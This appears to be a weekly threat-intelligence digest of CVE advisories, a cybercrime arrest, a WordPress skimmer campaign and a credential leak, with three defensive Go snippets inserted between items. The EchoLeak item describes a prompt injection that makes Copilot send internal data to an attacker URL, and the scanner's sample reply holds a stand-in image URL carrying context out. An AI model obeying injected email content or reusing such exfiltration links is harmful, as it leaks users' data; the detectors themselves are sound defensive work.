Weekly Threat Landscape Digest – Week 26

This week’s cyber threat landscape reveals a surge in zero-day exploit activity, advanced phishing schemes, and the active targeting of known but unpatched vulnerabilities across various industries. Adversaries are showing increased sophistication, often blending into legitimate traffic by using open-source tools and trusted services to bypass security controls.
To counter these evolving threats, organizations must prioritize robust patch and vulnerability management, enhance real-time threat detection, and maintain comprehensive visibility across endpoints and network assets. In parallel, strengthening employee cyber awareness, ensuring timely threat intelligence delivery, and rehearsing incident response procedures are essential for minimizing risk and accelerating recovery.
Together, these proactive steps build a stronger, more adaptive defense against modern cyber threats.
- Privilege Escalation Vulnerability in HPE OneView for VMware vCenter (CVE-2025-37101)
A critical local privilege escalation vulnerability has been identified in HPE OneView for VMware vCenter (OV4VC), affecting all versions prior to v11.7. The vulnerability allows a read-only user to gain administrative privileges, potentially compromising the integrity and availability of affected systems in virtualized environments.
Vulnerability Details:
- CVE ID: CVE-2025-37101
- CVSS v3.1 score: 8.7 (High)
- Affected Product: HPE OneView for VMware vCenter with Operations Manager and Log Insight
- Impact: Privilege escalation and execution of unauthorized administrative actions
- Affected Versions: All versions prior to v11.7
- Fixed Version: v11.7 and later
Recommendations:
Organizations are strongly advised to upgrade to version 11.7 or later immediately. Review user permissions and monitor system activity for unusual behavior. Prompt patching is essential to prevent exploitation.
Reference:
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04876en_us&docLocale=en_US
- Security Updates – Mozilla Firefox (CVE-2025-6424, CVE-2025-6425, CVE-2025-6426)
Mozilla has released security updates for Firefox to address multiple high and moderate severity vulnerabilities. These flaws could lead to application crashes, user tracking via a persistent UUID, and, on macOS, execution of terminal files without any warning.
Vulnerability Details:
- CVE-2025-6424
- Severity: High
- Description: Use-after-free in FontFaceSet could lead to a potentially exploitable crash.
- CVE-2025-6425
- Severity: Moderate
- Description: The WebCompat extension exposed a persistent UUID, enabling attackers to track browsers across sessions and modes.
- CVE-2025-6426
- Severity: Moderate
- Description: Firefox for macOS failed to warn users before executing terminal files, increasing risk of unintended command execution. Other platforms are unaffected.
Fixed Versions:
- Firefox 140
- Firefox ESR 115.25
- Firefox ESR 128.12
Recommendations:
Users and administrators are strongly advised to upgrade to the latest patched versions of Firefox. Review browser settings for extensions, especially in enterprise environments, and enforce secure update policies.
References:
https://www.mozilla.org/en-US/security/advisories/mfsa2025-51/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-52/
https://www.mozilla.org/en-US/security/advisories/mfsa2025-53/
- Critical Remote Code Execution Vulnerabilities in Cisco Identity Services Engine (CVE-2025-20281, CVE-2025-20282)
Cisco has disclosed two critical unauthenticated remote code execution (RCE) vulnerabilities in Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). These flaws allow remote attackers to execute arbitrary commands as root without authentication. Both vulnerabilities are rated CVSS 10.0, indicating maximum severity and exploitability.
Vulnerability Details:
- CVE-2025-20281 – Cisco ISE API Unauthenticated Remote Code Execution
- Severity: Critical
- CVSS Score: 10.0
- Affected Versions: ISE and ISE-PIC 3.3 and later
- Impact: Allows unauthenticated attackers to send crafted API requests that result in root-level command execution.
- Cause: Improper input validation in a public API.
- Fixed In:
- ISE 3.3 Patch 6
- ISE 3.4 Patch 2
- CVE-2025-20282 – Cisco ISE API Unauthenticated File Upload & Execution
- Severity: Critical
- CVSS Score: 10.0
- Affected Versions: ISE and ISE-PIC 3.4 only
- Impact: Unauthenticated attackers can upload and execute arbitrary files as root, leading to full system compromise.
- Cause: Lack of validation during file upload via an internal API.
- Fixed In:
- ISE 3.4 Patch 2
Recommendations:
All affected organizations are urged to apply the security patches immediately. No workarounds exist for these vulnerabilities. Ensure systems are updated to the latest patched versions to prevent exploitation.
Reference:
- Actively Exploited Critical Vulnerability in NetScaler ADC (CVE-2025-6543)
Citrix has released urgent security updates for NetScaler ADC and NetScaler Gateway to address a critical memory overflow vulnerability (CVE-2025-6543) that is being actively exploited in the wild. The vulnerability can lead to unintended control flow and Denial of Service (DoS) when NetScaler is configured as a Gateway or AAA virtual server.
Vulnerability Details:
- CVE ID: CVE-2025-6543
- Severity: Critical
- CVSS v4.0 Base Score: 9.2
- Impact: Memory overflow leading to unintended control flow and Denial of Service
- Pre-conditions: NetScaler must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server
- Exploitation Status: Actively exploited in the wild
Affected Versions:
- NetScaler ADC and Gateway 14.1 before 14.1-47.46
- NetScaler ADC and Gateway 13.1 before 13.1-59.19
- NetScaler ADC 13.1-FIPS and NDcPP before 13.1-37.236
Fixed Versions:
- NetScaler ADC and Gateway 14.1-47.46 and later
- NetScaler ADC and Gateway 13.1-59.19 and later
- NetScaler ADC 13.1-FIPS / NDcPP 13.1-37.236 and later (available via support)
Recommendations:
Organizations are advised to upgrade to the fixed versions immediately. If using 13.1-FIPS or NDcPP builds, contact Citrix support for the appropriate patches. Maintain vigilance and monitor for signs of exploitation.
Reference:
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694788
- Critical Vulnerability in Kibana (CVE-2025-2135)
Elastic has released urgent security updates to address a critical vulnerability in Kibana, identified as CVE-2025-2135. The flaw stems from a Chromium Type Confusion issue that may result in heap corruption when processing specially crafted HTML pages. This vulnerability impacts both self-hosted and Elastic Cloud Kibana instances where PDF or PNG reporting is enabled, and could allow remote code execution within the reporting environment.
Vulnerability Details:
- CVE ID: CVE-2025-2135
- Vulnerability Type: Heap corruption via Chromium Type Confusion
- Impact: Remote Code Execution in the Kibana reporting environment
- Attack Vector: Network
- Privileges Required: Low
- User Interaction: None
- Exploitability: High
- Severity: Critical
Impacted Versions:
- 7.x: Up to and including 7.17.28
- 8.x: 8.0.0–8.17.7 and 8.18.0–8.18.2
- 9.x: 9.0.0–9.0.2
Fixed Versions:
- 7.17.29
- 8.17.8
- 8.18.3
- 9.0.3
Recommendations:
All affected users should upgrade to the latest fixed versions immediately. If upgrading is not possible, apply available mitigations to reduce exposure. Ensure only trusted sources can access reporting features and review access controls.
Reference:
https://discuss.elastic.co/t/kibana-7-17-29-8-17-8-8-18-3-9-0-3-security-update-esa2025-09/379443/1
- Security Updates – TeamViewer Remote Management (CVE-2025-36537)
TeamViewer has released a security update to address a high-severity local privilege escalation vulnerability in its Remote Management (RM) components, affecting both Full Client and Host versions on Windows systems. The flaw, tracked as CVE-2025-36537, arises from incorrect permission assignments that allow a local attacker to delete arbitrary files using SYSTEM privileges, potentially leading to system compromise.
Vulnerability Details:
- CVE ID: CVE-2025-36537
- Severity: High
- CVSS v3.1 score: 7.0 (High)
- CWE: CWE-732 – Incorrect Permission Assignment for Critical Resource
- Exploit Prerequisites: Local access, RM features enabled
- Impact: Arbitrary file deletion as SYSTEM, privilege escalation
- Affected Features: Remote Management (Backup, Monitoring, Patch Management)
- Not Affected: Systems without Remote Management features
- Fixed In: Version 15.67 and above
- Exploit Status: No known exploitation in the wild
Recommendations:
Organizations using TeamViewer Remote Management are strongly advised to upgrade to version 15.67 or later. Disable unused RM features if not required, and audit local user access to prevent misuse of elevated privileges.
Reference:
https://www.teamviewer.com/en-us/resources/trust-center/security-bulletins/tv2025-1002/
- RCE Vulnerability in WinRAR (CVE-2025-6218)
A critical remote code execution (RCE) vulnerability has been disclosed in RARLAB’s WinRAR, the widely used file compression utility for Windows. Tracked as CVE-2025-6218 and rated CVSS 7.8, the flaw stems from a directory traversal issue caused by insufficient validation during archive extraction. An attacker can exploit this by crafting a malicious archive that, when opened by a user, extracts files to arbitrary paths, potentially leading to full system compromise.
Vulnerability Details:
- CVE ID: CVE-2025-6218
- Severity: High
- CVSS v3.1 score: 7.8
- Impact: Remote Code Execution
- Vulnerability Type: Directory Traversal via crafted archive paths
- Affected Versions: WinRAR versions prior to 7.12 Beta 1
- Fixed Version: WinRAR 7.12 Beta 1
Recommendations:
All users and organizations utilizing WinRAR are urged to upgrade to version 7.12 Beta 1 or later immediately. Avoid opening unknown or suspicious archive files, and implement endpoint protection mechanisms to block potentially malicious file extractions.
Reference:
https://www.zerodayinitiative.com/advisories/ZDI-25-409/
- OpenVPN Driver Flaw Lets Attackers Crash Windows Systems (CVE-2025-50054)
A critical vulnerability has been disclosed in the OpenVPN driver for Windows, enabling remote attackers to crash systems by sending specially crafted network packets. Tracked as CVE-2025-50054, this flaw resides in the Windows kernel-mode wintun-based OpenVPN driver and may be exploited in denial-of-service (DoS) scenarios, impacting VPN reliability and enterprise availability.
Vulnerability Details:
- CVE ID: CVE-2025-50054
- Component: OpenVPN for Windows (wintun driver)
- Attack Vector: Remote (network-based)
- Impact: System crash via unauthenticated malicious traffic
- Affected Versions: All Windows OpenVPN versions using the wintun driver prior to 2.7_alpha2
- Fixed Version: OpenVPN 2.7_alpha2 (Released June 19, 2025)
Recommendations:
Although version 2.7_alpha2 is an alpha release and not intended for production, administrators are urged to evaluate the driver-level risk and consider testing or isolating affected deployments. Monitor network activity for unusual traffic and ensure fallback mechanisms are in place to mitigate potential VPN outages.
Reference:
https://openvpn.net/community-downloads/
- Critical Arbitrary Code Execution Vulnerability in IBM WebSphere Application Server (CVE-2025-36038)
A critical remote code execution (RCE) vulnerability has been identified in IBM WebSphere Application Server (WAS), caused by deserialization of untrusted data. This flaw allows remote attackers to execute arbitrary code without user interaction, potentially leading to full system compromise.
Vulnerability Details:
- CVE ID: CVE-2025-36038
- Severity: 9.0 (Critical)
- CWE: CWE-502 – Deserialization of Untrusted Data
- Impact: Remote Code Execution without authentication or user interaction
- Affected Versions:
- IBM WAS 9.0.0.0 – 9.0.5.24
- IBM WAS 8.5.0.0 – 8.5.5.27
- Fixed Versions:
- WAS 9.0: Fix Pack 9.0.5.25+ and interim fix for APAR PH66674
- WAS 8.5: Fix Pack 8.5.5.28+ and interim fix for APAR PH66674
Recommendations:
Organizations using vulnerable versions should upgrade to the latest fix packs and apply the interim fix (PH66674) immediately. There are no available workarounds; patching is the only effective mitigation. Refer to IBM’s support page for version-specific details.
Reference:
https://www.ibm.com/support/pages/node/7237967
- Critical Command Execution Vulnerabilities in IBM QRadar SIEM (CVE-2025-33117, CVE-2025-36050, CVE-2025-33121)
IBM has released a critical security bulletin addressing multiple vulnerabilities in its QRadar Security Information and Event Management (SIEM) platform, affecting versions 7.5 to 7.5.0 UP12 IF01. These vulnerabilities vary in severity and impact, including remote code execution, information disclosure, and denial-of-service risks. The most severe flaw, CVE-2025-33117, allows remote command execution via autoupdate abuse.
Vulnerability Details:
- CVE-2025-33117 – Remote Command Execution via Autoupdate Abuse
- Severity: Critical (CVSS 9.1)
- Impact: Arbitrary code execution through malicious autoupdate packages
- Description: A privileged user can upload a crafted package which, upon processing, results in command execution with elevated privileges.
- CVE-2025-36050 – Log Information Disclosure
- Severity: Medium (CVSS 6.2)
- Impact: Sensitive data exposure
- Description: Local attackers with filesystem access may read QRadar logs containing internal configuration and credentials.
- CVE-2025-33121 – XML External Entity (XXE) Injection
- Severity: High (CVSS 7.1)
- Impact: Information disclosure or denial-of-service via crafted XML
- Description: Improper XML parsing enables attackers to retrieve files or exhaust system memory.
Affected Versions:
- IBM QRadar SIEM 7.5 to 7.5.0 UP12 IF01
Fixed Version:
- IBM QRadar SIEM 7.5.0 UP12 IF02
Recommendations:
- Upgrade to version 7.5.0 UP12 IF02 immediately.
- Audit and restrict privileged user access.
- Monitor autoupdate activity and disable auto-updates if not required.
Reference:
IBM Advisory
- Critical Remote Code Execution Vulnerability in Mattermost (CVE-2025-4981)
A critical vulnerability has been discovered in Mattermost, the popular open-source team collaboration platform, affecting multiple versions and exposing enterprise environments to high-risk exploitation. The vulnerability, CVE-2025-4981, enables authenticated users to perform path traversal attacks by uploading malicious archive files, potentially leading to remote code execution (RCE) and privilege escalation.
Vulnerability Details:
- CVE ID: CVE-2025-4981
- CVSS Score: 9.9 (Critical)
- Vulnerability Type: Path Traversal → Arbitrary File Write → Remote Code Execution
- Attack Vector: Authenticated file upload (e.g., .zip, .tar.gz)
- Impact: Remote Code Execution, File System Compromise, Privilege Escalation
- Exploitable By: Any authenticated user with file upload permissions
Affected Versions:
- 10.5.x ≤ 10.5.5
- 9.11.x ≤ 9.11.15
- 10.8.x ≤ 10.8.0
- 10.7.x ≤ 10.7.2
- 10.6.x ≤ 10.6.5
Fixed Versions:
- 10.9.0
- 10.8.1
- 10.7.3
- 10.6.6
- 10.5.6
- 9.11.16
Recommendations:
- Upgrade Immediately: All Mattermost users should upgrade to the latest patched versions.
- Audit Upload Permissions: Limit archive upload privileges to trusted users only.
- Monitor System Logs: Review logs for unusual file extractions or write attempts outside expected directories.
Reference:
Mattermost Security Advisory
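Both the WinRAR (CVE-2025-6218) and Mattermost (CVE-2025-4981) items above are the same bug class: an archive entry name containing "../" or an absolute path selects a write location outside the extraction directory. The following Go code is an added example of the check such an extractor needs, not code from either project: `safePath` rejects escaping entry names, `extractArchive` vets every entry before writing a single byte, and `buildZip` constructs the sample archives in memory.

```go
package main

import (
	"archive/zip"
	"bytes"
	"errors"
	"os"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned for an archive entry that would land outside destDir.
var ErrTraversal = errors.New("archive entry escapes destination directory")

// safePath maps an archive entry name to a path under destDir and rejects
// anything that would escape it: empty or absolute names, and names whose
// cleaned form climbs above the root through "..". This is the missing check.
func safePath(destDir, name string) (string, error) {
	rel := filepath.FromSlash(name) // archive names use forward slashes
	if name == "" || strings.HasPrefix(name, "/") || filepath.IsAbs(rel) || filepath.VolumeName(rel) != "" {
		return "", ErrTraversal
	}
	root, err := filepath.Abs(destDir)
	if err != nil {
		return "", err
	}
	target := filepath.Join(root, rel) // Join cleans, resolving any ".." segments
	if target == root || !strings.HasPrefix(target, root+string(os.PathSeparator)) {
		return "", ErrTraversal
	}
	return target, nil
}

// extractArchive vets every entry name before writing anything, so a hostile
// archive cannot get its benign files written and then abort part-way.
// Newer Go releases may flag non-local names with zip.ErrInsecurePath while
// still returning a usable reader; that is tolerated since safePath re-checks.
func extractArchive(data []byte, destDir string) error {
	zr, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil && !errors.Is(err, zip.ErrInsecurePath) {
		return err
	}
	targets := make([]string, len(zr.File))
	for i, f := range zr.File {
		if targets[i], err = safePath(destDir, f.Name); err != nil {
			return err
		}
	}
	for i, f := range zr.File {
		if f.FileInfo().IsDir() {
			continue // parents of files are created below; empty dirs are skipped
		}
		if err := os.MkdirAll(filepath.Dir(targets[i]), 0o755); err != nil {
			return err
		}
		if err := writeEntry(f, targets[i]); err != nil {
			return err
		}
	}
	return nil
}

// writeEntry copies one archive member to an already-vetted target path.
func writeEntry(f *zip.File, target string) error {
	rc, err := f.Open()
	if err != nil {
		return err
	}
	defer rc.Close()
	out, err := os.OpenFile(target, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0o644)
	if err != nil {
		return err
	}
	defer out.Close()
	_, err = out.ReadFrom(rc)
	return err
}

// buildZip constructs an archive in memory from name -> content pairs
// (constructed sample data for this example, not from any real incident).
func buildZip(entries map[string]string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range entries {
		w, _ := zw.Create(name)
		w.Write([]byte(body))
	}
	zw.Close()
	return buf.Bytes()
}
```

The two-pass structure matters: an archive that mixes benign and escaping entries is refused as a whole, so nothing from it reaches disk.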
- Critical Authentication Bypass Vulnerability in Teleport (CVE-2025-49825)
A critical security vulnerability (CVE-2025-49825) has been discovered in Teleport, an open-source platform used to manage secure access to servers, cloud applications, and infrastructure. This flaw allows remote attackers to bypass SSH authentication controls, posing a serious threat to enterprise environments using Teleport in both self-hosted and cloud-based deployments.
Vulnerability Details:
- CVE ID: CVE-2025-49825
- Severity: Critical (CVSS 9.8)
- Impact: Remote SSH Authentication Bypass
- Attack Vector: Remote (via SSH, Git Proxy, Kubernetes integration)
- Exploit Status: No known public exploit; no active exploitation reported
Affected Versions (Teleport Community Edition):
- Versions prior to 17.5.2
- Versions prior to 16.5.12
- Versions prior to 15.5.3
- Versions prior to 14.4.1
- Versions prior to 13.4.27
- Versions prior to 12.4.35
Fixed Versions:
- 17.5.2
- 16.5.12
- 15.5.3
- 14.4.1
- 13.4.27
- 12.4.35
Recommendations:
- Upgrade Immediately: All organizations using vulnerable versions of Teleport should upgrade to the patched versions listed above.
- Audit SSH and Git Access Logs: Review authentication logs for any anomalies or unauthorized access attempts.
- Restrict External Access: Limit SSH and Git proxy exposure to trusted IP ranges until patching is complete.
Reference:
Teleport GitHub Security Advisory
- Critical Vulnerabilities in ControlID iDSecure Software (CVE-2025-49851, CVE-2025-49852, CVE-2025-49853)
Multiple critical vulnerabilities have been identified in ControlID’s iDSecure On-Premises software, which is widely used for vehicle and physical access control. These vulnerabilities enable attackers to gain unauthorized access, exploit internal resources, and manipulate backend databases, all without requiring user interaction.
Vulnerability Details:
- CVE-2025-49851 – Improper Authentication
- Description: Authentication bypass allowing unauthorized access and potential privilege escalation.
- CVSS v4 Score: 8.7
- Impact: Unauthorized system access.
- CVE-2025-49852 – Server-Side Request Forgery (SSRF)
- Description: Allows attackers to craft HTTP requests that interact with internal systems and services.
- CVSS v4 Score: 8.7
- Impact: Internal information disclosure.
- CVE-2025-49853 – SQL Injection
- Description: Vulnerability enabling attackers to execute arbitrary SQL queries, resulting in potential data leakage or modification.
- CVSS v4 Score: 9.3
- Impact: Arbitrary data manipulation and leakage.
Affected Versions:
- iDSecure On-Premises versions 4.7.48.0 and earlier
Fixed Version:
- iDSecure On-Premises version 4.7.50.0
Recommendations:
- Upgrade Immediately: Organizations using affected versions should upgrade to version 4.7.50.0 or later.
- Audit Access Logs: Review logs for unauthorized access or abnormal queries.
- Restrict External Access: Implement network segmentation and firewall controls to minimize exposure.
Reference:
https://www.controlid.com.br/en/access-control/idsecure/
- High-Severity Vulnerabilities in NVIDIA Megatron-LM (CVE-2025-23264, CVE-2025-23265)
NVIDIA has released a security update for its Megatron-LM framework to address multiple high-severity vulnerabilities that affect all platforms. These vulnerabilities allow attackers to inject code via malicious files, potentially leading to arbitrary code execution, privilege escalation, data tampering, and information disclosure.
Vulnerability Details:
- CVE IDs: CVE-2025-23264, CVE-2025-23265
- CVSS Score: 7.8 (High)
- Component: Python-based file parsing
- Impact:
- Code Execution
- Privilege Escalation
- Information Disclosure
- Data Tampering
Affected Platforms:
- All platforms running vulnerable versions of NVIDIA Megatron-LM
Affected Versions:
- All versions prior to 0.12.0
Fixed Version:
- Version 0.12.1
Recommendations:
- Update Immediately: All organizations using Megatron-LM should upgrade to version 0.12.1 or later.
- Audit Python Environments: Review file permissions and scan for any unexpected scripts or payloads.
- Restrict File Uploads: Apply input sanitization and validation to reduce the attack surface.
Reference:
https://nvidia.custhelp.com/app/answers/detail/a_id/5663
- Critical Remote Code Execution Vulnerability in Convoy (CVE-2025-52562)
A critical vulnerability has been discovered in Convoy, a widely adopted KVM server management panel used by hosting providers. Tracked as CVE-2025-52562, the flaw allows unauthenticated remote code execution (RCE) through specially crafted HTTP requests. The root cause is tied to improper sanitization in the LocaleController, enabling directory traversal and unsafe PHP file inclusion.
Vulnerability Details:
- CVE ID: CVE-2025-52562
- CVSS Score: 10.0 (Critical)
- Component: LocaleController
- Impact:
- Unauthenticated Remote Code Execution
- Full system compromise
- Data theft and manipulation
- Attack Vector: Remote (via HTTP using locale/namespace parameters)
- Root Cause: Directory traversal and unsafe file inclusion
Affected Product:
- Convoy KVM Server Management Panel
Affected Versions:
- 3.9.0-rc.3 through 4.4.0
Fixed Version:
- Version 4.4.1 and later
Exploit Status:
- No public exploit disclosed
- Proof-of-concept likely feasible
Recommendations:
- Upgrade Immediately: Apply the patch by upgrading to version 4.4.1 or later.
- Restrict External Access: Until patched, consider limiting access to Convoy admin interfaces using firewalls or VPNs.
- Monitor Logs: Look for suspicious HTTP requests containing unexpected locale or namespace parameters.
Reference:
https://github.com/ConvoyPanel/panel/security/advisories/GHSA-43g3-qpwq-hfgg
- Zero-Click Prompt Injection Vulnerability in Microsoft 365 Copilot (CVE-2025-32711 – EchoLeak)
A critical zero-click prompt injection vulnerability, tracked as CVE-2025-32711 and dubbed EchoLeak, has been identified in Microsoft 365 Copilot, marking the first confirmed breach of its kind. With a CVSS score of 9.3, this vulnerability allows attackers to extract internal organizational data without user interaction. The exploit involves sending a benign-looking email or calendar invite embedded with markdown-based prompt injection. Copilot automatically ingests such content as contextual input and—without any user action—appends internal data to an attacker-controlled URL during its normal response behavior.
This issue highlights a fundamental flaw in AI assistant architecture, where inputs from trusted sources (e.g., inboxes or calendars) are not contextually sandboxed. The attack flow is entirely passive, invisible to users and SOC monitoring tools, and relies on Copilot behaving exactly as designed. Unlike traditional phishing or malware campaigns, this vulnerability exploits the AI’s contextual blending of safe and hostile data without triggering alerts.
Key implications include the need for organizations to:
- Treat prompt ingestion as a security boundary.
- Segment context inputs (emails, chats, documents) to prevent cross-contamination.
- Monitor AI assistant outputs as outbound traffic.
- Demand transparency from AI vendors regarding trigger conditions and data visibility.
Reference:
LinkedIn – Maria Luisa Redondo on CVE-2025-32711 (EchoLeak)
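The "monitor AI assistant outputs as outbound traffic" point above can be made concrete. The Go code below is an added example, not Microsoft's code or anything from the EchoLeak write-up: it parses every markdown link and image destination in an assistant reply, classifies it against an allowlist of hosts, and flags whether the URL carries a query string or fragment where appended context would travel. The host names and the sample reply are constructed for this example.

```go
package main

import (
	"net/url"
	"regexp"
)

// mdRefRe captures the destination of markdown links and images,
// [text](url) and ![alt](url): the channel through which an injected
// prompt can make the assistant's own reply carry data to an external host.
var mdRefRe = regexp.MustCompile(`!?\[[^\]]*\]\(([^)\s]+)\)`)

// OutboundRef is one external reference found in an assistant reply.
type OutboundRef struct {
	URL      string
	Host     string
	HasQuery bool // query string or fragment present: where appended context would travel
	Allowed  bool // host is on the tenant's allowlist
}

// scanAssistantReply treats the reply as outbound traffic: every link and
// image destination is parsed and classified against an allowlist of hosts.
func scanAssistantReply(reply string, allowedHosts map[string]bool) []OutboundRef {
	var refs []OutboundRef
	for _, m := range mdRefRe.FindAllStringSubmatch(reply, -1) {
		u, err := url.Parse(m[1])
		if err != nil {
			refs = append(refs, OutboundRef{URL: m[1]}) // unparsable: unknown host, not allowed
			continue
		}
		refs = append(refs, OutboundRef{
			URL:      m[1],
			Host:     u.Hostname(),
			HasQuery: u.RawQuery != "" || u.Fragment != "",
			Allowed:  allowedHosts[u.Hostname()],
		})
	}
	return refs
}

// suspiciousRefs keeps the references worth blocking or alerting on: anything
// whose host is off the allowlist. HasQuery tells the analyst whether the
// reference could also carry appended data out of the tenant.
func suspiciousRefs(refs []OutboundRef) []OutboundRef {
	var out []OutboundRef
	for _, r := range refs {
		if !r.Allowed {
			out = append(out, r)
		}
	}
	return out
}

// sampleReply is a constructed assistant reply for this example: one legitimate
// intranet link and one image reference whose query string carries context.
const sampleReply = "Here is the summary you asked for.\n" +
	"See [the travel policy](https://intranet.example.com/policies/travel).\n" +
	"![status](https://collector.example.invalid/pixel.png?ctx=meeting%20notes)\n"
```

Image references deserve the most attention: a client renders them without any click, which is what makes the channel zero-click.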
- Arrest of BreachForums v2 Operators in France
On June 24, 2025, French authorities arrested five individuals allegedly involved in operating BreachForums v2, a notorious cybercrime marketplace used for trading stolen data and unauthorized access to corporate networks. The arrests, carried out by the BL2C cybercrime unit of the Paris police, occurred during coordinated raids in Hauts-de-Seine (Paris), Seine-Maritime (Normandy), and Réunion (Overseas).
The following individuals were reportedly apprehended:
- ShinyHunters (Admin/Owner)
- IntelBroker (Admin/Owner – previously arrested in February 2025)
- Hollow (Moderator)
- Noct
- Depressed
BreachForums v2 emerged after the takedown of the original BreachForums in 2023, which followed the arrest of Pompompurin (Conor Brian FitzPatrick). The new iteration quickly gained popularity within the underground cybercrime community and was associated with high-profile data breaches targeting both public and private sector entities.
Key incidents linked to the arrested threat actors include:
- France Travail: Breach compromising data of 43 million individuals
- French entities: SFR, Boulanger, French Football Federation
- Global targets (IntelBroker): Europol, DC Health Link, AMD, Cisco, Nokia, GE, Weee!
- Major corporations (ShinyHunters): Salesforce, Snowflake attacks (impacting Santander, Ticketmaster, AT&T, and more)
The forum was reportedly taken offline in April 2025 following a MyBB zero-day breach and has not resurfaced since.
This significant disruption to a major cybercrime infrastructure may temporarily impact data trading and breach-as-a-service operations on the dark web. However, copycat platforms or successors may attempt to fill the void.
- Modular Malware Framework Leveraging Rogue WordPress Plugin for Skimming and Credential Theft
The Wordfence Threat Intelligence Team uncovered a sophisticated and modular malware family during a site cleanup on May 16, 2025. This malware campaign, ongoing since at least September 2023, consists of over 20 variants sharing a common codebase. These variants include capabilities for credit card skimming, WordPress credential theft, malvertising, and custom payload delivery, with some even hosting live attacker backends directly on infected WordPress sites.
Key Capabilities and Techniques
- Modular Design: All samples shared identical obfuscation methods and anti-analysis features like console rebinding and developer tools detection. Certain versions used infinite loops and debugger traps to evade reverse engineering.
- Targeted Execution: Malware avoids executing on admin panels, and selectively operates on checkout pages. Some variants include lists of disallowed emails/domains to avoid detection.
- Form Manipulation & Skimming: Used HTML injection, overlays, and formjacking with Base64-encoded fake payment forms. Skimmed data is exfiltrated via Base64-encoded strings appended to attacker-controlled URLs.
- Stealth & Persistence: Leveraged localStorage for persistence and employed realistic fake elements like human verification screens mimicking Cloudflare.
- User Profiling: Gathered device/browser metadata, categorized traffic sources, and avoided bots to enhance profiling for malvertising.
- Dynamic Link Replacement: Infected sites replaced legitimate links with malicious ones to further propagate malware.
Rogue WordPress Plugin
One variant masqueraded as a WordPress plugin named “WordPress Core,” with empty scaffolding files and a malicious wordpress-core-public.js skimmer targeting WooCommerce checkout fields. Backend functionality was embedded in PHP files, notably:
- register-messages-posttype.php: Created backend infrastructure for data collection.
- wordpress-core.php: Manipulated WooCommerce orders via hooks (woocommerce_thankyou, wp_footer) to complete fraudulent transactions silently.
This hybrid use of JavaScript and PHP within a plugin represents an evolution in web-based malware delivery and stealth.
Reference:
https://www.wordfence.com/blog/2025/06/a-deep-dive-into-a-modular-malware-family
- Fake Tech Support Numbers Injected into Legitimate Websites via Search Parameter Exploit
Security researchers at Malwarebytes have uncovered a deceptive campaign where scammers inject fake tech support phone numbers into legitimate websites by exploiting a vulnerability known as search parameter injection (or reflected input vulnerability). This method manipulates the URL of an official site to display attacker-controlled content — primarily fraudulent phone numbers — while still showing the legitimate domain in the browser.
Key Attack Mechanics
- Search Parameter Injection: Attackers embed malicious input in the query parameters of URLs, altering visible page elements like support contact numbers.
- Legitimate Website Display: Even though the site appears authentic (e.g., Apple, PayPal, Netflix), the phone number may be replaced with a scammer’s contact.
- Google Ads Abuse: Scammers purchase Google Ads to display manipulated links in search results, often appearing above real links.
- No Website Compromise: The actual websites are not hacked; the scam relies on reflected input vulnerabilities and open search parameters.
Threat Behavior
- Users clicking on a malicious ad are redirected to a legitimate page, but with URL parameters that alter visible content (e.g., ?support=+1-800-XXX-XXXX).
- Victims who call the fake number are subjected to social engineering, where scammers:
- Impersonate legitimate support agents
- Steal personal and financial information
- Request remote access to devices
- Attempt extortion or malware installation
Researcher Recommendations
Malwarebytes advises users to:
- Manually navigate to a company’s official domain instead of trusting ad links (e.g., visit www.apple.com directly).
- Avoid calling numbers embedded in the URL, especially if prompted to “Call Now” or similar high-pressure language.
- Inspect URLs for suspicious encodings like %20 (space) or %2B (‘+’).
- Use official support portals, not search engine results for support numbers.
- Beware of unsolicited support popups or unexpected redirects from search ads.
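As an added example of the "inspect URLs" advice above (not code from Malwarebytes), the Go helper below percent-decodes every query parameter of a URL, so that %2B and %20 become "+" and a space, and reports any parameter whose decoded value contains a phone-number pattern, which a legitimate search or support parameter has no business carrying. The phone regex, host names and sample links are constructed for this example.

```go
package main

import (
	"net/url"
	"regexp"
	"sort"
)

// phoneRe matches the kind of number a support scam plants in a query string:
// optional "+" and country code, then ten digits with common separators.
// Constructed for this example; tune it for the number formats you see.
var phoneRe = regexp.MustCompile(`(\+?\d{1,3}[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}`)

// Finding is one query parameter whose decoded value looks like a phone number,
// content a search or support parameter of a legitimate site should not carry.
type Finding struct {
	Host  string
	Param string
	Value string
}

// inspectURL parses a raw URL, percent-decodes each query parameter (so %2B
// becomes "+" and %20 a space, the encodings the advisory singles out) and
// reports every parameter whose decoded value contains a phone-number pattern.
func inspectURL(raw string) ([]Finding, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	var out []Finding
	for param, values := range u.Query() { // Query() performs the decoding
		for _, v := range values {
			if phoneRe.MatchString(v) {
				out = append(out, Finding{Host: u.Hostname(), Param: param, Value: v})
			}
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Param < out[j].Param })
	return out, nil
}

// sampleURLs are constructed ad-style links for this example: two carry an
// injected number in a reflected parameter, the third is an ordinary search.
var sampleURLs = []string{
	"https://support.example.com/search?q=Call%20Now%20%2B1-800-555-0100%20support",
	"https://help.example.org/kb?topic=billing&phone=(800)%20555%200199",
	"https://support.example.com/search?q=reset%20password",
}
```

The decoded value is what the page will reflect, so the check must run after decoding rather than on the raw query string.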
- Record-Breaking 16 Billion Passwords Exposed in Infostealer-Powered Mega Breach
Key Highlights
- Largest breach in history: Over 16 billion login credentials leaked, spanning social, financial, corporate, and developer platforms.
- Not old data: Many records are recent and not recycled, posing immediate risk.
- Data origin: Likely extracted from infostealer malware such as RedLine, Raccoon, Vidar, etc.
- Affected platforms include: Facebook, Google, Apple, GitHub, Telegram, Zoom, Twitch, and more.
- Data format: Typical entries included URL + login + password, aligned with infostealer data structures.
Threat Impact
- Highly weaponizable: Includes cookies, tokens, and session data capable of bypassing 2FA.
- Real-world consequences: Facilitates phishing, account takeover, business email compromise (BEC), ransomware attacks, and digital identity theft.
